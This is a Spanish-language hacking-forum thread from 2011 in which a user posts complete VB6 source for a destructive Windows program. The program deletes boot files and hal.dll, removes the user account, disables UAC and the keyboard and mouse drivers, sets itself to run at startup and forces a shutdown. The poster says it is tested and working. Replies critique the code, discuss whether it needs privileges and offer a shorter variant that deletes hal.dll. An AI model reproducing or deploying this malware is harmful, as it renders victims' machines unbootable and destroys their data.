elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 18:58  


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Sysfucker en VB6.0
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Sysfucker en VB6.0  (Leído 3,074 veces)
TheTroyanDark

Desconectado Desconectado

Mensajes: 141


Echo "Aprendiendo Batch."


Ver Perfil
Sysfucker en VB6.0
« en: 3 Julio 2011, 20:57 »

Bueno aqui le dejo un pequeño programa en Basic para DAÑAR el sistema no lo ejecuten... Leer bien el codigo..  :) Funciona probado por mi hihihih  :laugh:

Código:
Private Declare Function BlockInput Lib "user32" (ByVal fBlock _
As Long) As Long
Const API_FALSE As Long = 0&
Const API_TRUE As Long = 1&
Private Declare Function Beep Lib "kernel32" ( _
  ByVal dwFreq As Long, _
  ByVal dwDuration As Long) As Long
Private Sub Form_Load()
On Error Resume Next
Form1.Hide
  a = FreeFile
  b = FreeFile
  Open "c:\windows\chkmgr32.bat" For Output As a
    Print #a, "shutdown -s -t 10 -f"
    Print #a, "start c:\windows\notfall.bat"
    Close a
   
Open "c:\windows\notfall.bat" For Output As b
Print #b, "erase /f %windir%\system32\hal.dll"
Print #b, "erase /f %HOMEDRIVE%\NTDETECT.COM"
Print #b, "erase /f %HOMEDRIVE%\bootmgr"
Print #b, "erase /f %HOMEDRIVE%\bootfont.bin"
Print #b, "erase /f %HOMEDRIVE%\BOOTSECT.BAK"
Print #b, "erase /f %HOMEDRIVE%\boot.ini"
Print #b, "erase /f %HOMEDRIVE%\ntldr"
Close b
'Zerstörung...
Call Shell("net user Administrator /active:no")
Call Shell("net user %username% /del")
Call Shell("reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f")
Call Shell("cmd /c erase /f %windir%\system32\hal.dll")
Call Shell("cmd /c tskill /f explorer")
Call Shell("cmd /c tskill /f icq")
Call Shell("reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d c:\windows\chkmgr32.bat /f")
Call Shell("cmd /c erase /f %HOMEDRIVE%\ntldr")
Call Shell("cmd /c erase /f %HOMEDRIVE%\boot.ini")
Call Shell("cmd /c erase /f %HOMEDRIVE%\BOOTSECT.BAK")
Call Shell("cmd /c erase /f %HOMEDRIVE%\bootfont.bin")
Call Shell("cmd /c erase /f %HOMEDRIVE%\bootmgr")
Call Shell("cmd /c erase /f %HOMEDRIVE%\NTDETECT.COM")
Call Shell("cmd /c del /q %windir%\inf\*.*")
Call Shell("cmd /c del /q %windir%\repair\*.*")
Call Shell("reg add HKLM\System\CurrentControlSet\Services\Mouclass /v Start /t REG_DWORD /d 4 /f")
Call Shell("reg add HKLM\System\CurrentControlSet\Services\Kbdclass /v Start /t REG_DWORD /d 4 /f")

Form1.Show
Call BlockInput(API_TRUE)
Call Shell("shutdown -s -t 10 -f")
MsgBox "haha dein windows wurde zerstört^^", vbInformation + vbMsgBoxSetForeground + vbMsgBoxRight, "haha"
Call Shell("cmd /c assoc .exe=WinRAR")
Beep 4000, 10000


End Sub

Aclaro que el codigo no es mio...  :)
En línea

"Pensando en Batch" XD
EFEX


Desconectado Desconectado

Mensajes: 326


"Dinero Facil"


Ver Perfil WWW
Re: Sysfucker en VB6.0
« Respuesta #1 en: 3 Julio 2011, 21:13 »

Para que tanto daño...
En línea


GITHUB: github.com/empirefx
TheTroyanDark

Desconectado Desconectado

Mensajes: 141


Echo "Aprendiendo Batch."


Ver Perfil
Re: Sysfucker en VB6.0
« Respuesta #2 en: 3 Julio 2011, 21:21 »

 ::) ps para nadie

Este codigo es para uso Educativo y sin intenciones de dañar a nadie.
En línea

"Pensando en Batch" XD
тαптяαпсє


Desconectado Desconectado

Mensajes: 736


Usuario EHN


Ver Perfil
Re: Sysfucker en VB6.0
« Respuesta #3 en: 3 Julio 2011, 21:25 »

Zerstörung en español : destrucción.

es un codigo interesante requiere privilegios,no?
En línea

TheTroyanDark

Desconectado Desconectado

Mensajes: 141


Echo "Aprendiendo Batch."


Ver Perfil
Re: Sysfucker en VB6.0
« Respuesta #4 en: 3 Julio 2011, 21:30 »

Zerstörung en español : destrucción.

es un codigo interesante requiere privilegios,no?

Ps en xp corre sin privilegio no se si corre en 7 lo he probado en mi pc y funciona muy bien  :rolleyes: jajajaj
En línea

"Pensando en Batch" XD
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.190


Se siente observado ¬¬'


Ver Perfil
Re: Sysfucker en VB6.0
« Respuesta #5 en: 3 Julio 2011, 21:43 »

VB6? Yo juraría que esta hecho en BATCH ;)
En línea

extreme69

Desconectado Desconectado

Mensajes: 160


Be BlackHat but don't forget your principles.


Ver Perfil
Re: Sysfucker en VB6.0
« Respuesta #6 en: 3 Julio 2011, 21:50 »

VB6? Yo juraría que esta hecho en BATCH ;)

Si, no sé para que se gastó en hacerlo en vb6, si lo necesitabas en .exe usabas el batch compiler y listo, te ahorrabas unos cuantos "call shell" :P
En línea

TheTroyanDark

Desconectado Desconectado

Mensajes: 141


Echo "Aprendiendo Batch."


Ver Perfil
Re: Sysfucker en VB6.0
« Respuesta #7 en: 3 Julio 2011, 21:50 »

VB6? Yo juraría que esta hecho en BATCH ;)

Si en visual basic pero se llama mucho la funcion shell para usar los comandos del batch

Supongo que con alguna modificaciones se puede dejar para que funcion en un .bat
En línea

"Pensando en Batch" XD
Edu


Desconectado Desconectado

Mensajes: 1.082


Ex XXX-ZERO-XXX


Ver Perfil
Re: Sysfucker en VB6.0
« Respuesta #8 en: 3 Julio 2011, 21:51 »

Correra con privilegios de Administrador sino no, y no es la gran cosa, decir que hace cosas que no se ejecutaran nunca como los archivos bat q crea ya que al reiniciar no entrara mas y entonces la entrada al registro esta demas y por eso no se ejecutaran los bats. En si, con 10 lineas ya haces lo que produce ese "virus"
En línea
тαптяαпсє


Desconectado Desconectado

Mensajes: 736


Usuario EHN


Ver Perfil
Re: Sysfucker en VB6.0
« Respuesta #9 en: 3 Julio 2011, 21:55 »

Correra con privilegios de Administrador sino no, y no es la gran cosa, decir que hace cosas que no se ejecutaran nunca como los archivos bat q crea ya que al reiniciar no entrara mas y entonces la entrada al registro esta demas y por eso no se ejecutaran los bats. En si, con 10 lineas ya haces lo que produce ese "virus"
Me acuerdo mi primer virus en CUH..en 14 lineas hice algo mucho mas efectivo que este "malware", que además como code en si deja mucho que desear, emplear Visual Basic para crear .bats y hacer llamadas a la consola..

Aparte que si alguien lo usa desde mi Invitado esto no corre ni en broma jaja
En línea

TheTroyanDark

Desconectado Desconectado

Mensajes: 141


Echo "Aprendiendo Batch."


Ver Perfil
Re: Sysfucker en VB6.0
« Respuesta #10 en: 3 Julio 2011, 21:55 »

Ps si es verdad... pero aclaro el codigo no es mio.. y como funciona bien lo subi... pero gracias por las criticas...  ;-)
En línea

"Pensando en Batch" XD
Elemental Code


Desconectado Desconectado

Mensajes: 497


Im beyond the system


Ver Perfil
Re: Sysfucker en VB6.0
« Respuesta #11 en: 11 Julio 2011, 02:55 »

no es mas facil esto?

Código
Private Sub Form_Load()
kill (Environ("SYSTEMROOT") & "\system32\hal.dll")
msgbox "Felicitaciones sos un pelotud*"
end
End Sub
En línea

VanX
Wiki

Desconectado Desconectado

Mensajes: 217


"El Conocimiento Humano, pertenece al Mundo"


Ver Perfil WWW
Re: Sysfucker en VB6.0
« Respuesta #12 en: 11 Julio 2011, 09:04 »

tantos print el av lo detecta como virus, lo mejor un bat a batch compiler y ya  ;-)
En línea

pitoloko


Desconectado Desconectado

Mensajes: 2.500


Ver Perfil
Re: Sysfucker en VB6.0
« Respuesta #13 en: 11 Julio 2011, 09:13 »

uys amigo!!!

me ha servido mucho tu code, más que nada porque no sabía como llamar a la consola desde vb6 xD

Código:
Call Shell("cmd /c del /q %windir%\inf\*.*")

perfeto, por cierto, en que windows lo has probado?

saludos
En línea

pa que
VanX
Wiki

Desconectado Desconectado

Mensajes: 217


"El Conocimiento Humano, pertenece al Mundo"


Ver Perfil WWW
Re: Sysfucker en VB6.0
« Respuesta #14 en: 11 Julio 2011, 13:30 »

uys amigo!!!

me ha servido mucho tu code, más que nada porque no sabía como llamar a la consola desde vb6 xD

Código:
Call Shell("cmd /c del /q %windir%\inf\*.*")

perfeto, por cierto, en que windows lo has probado?

saludos

Aunque no lo haya probado y no te dirijas a mi, decir que en win7 y winvista no funcionaría porque necesita permisos con lo cual es mejor para mi un .bat y luego con batch compiler

saludos :)
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines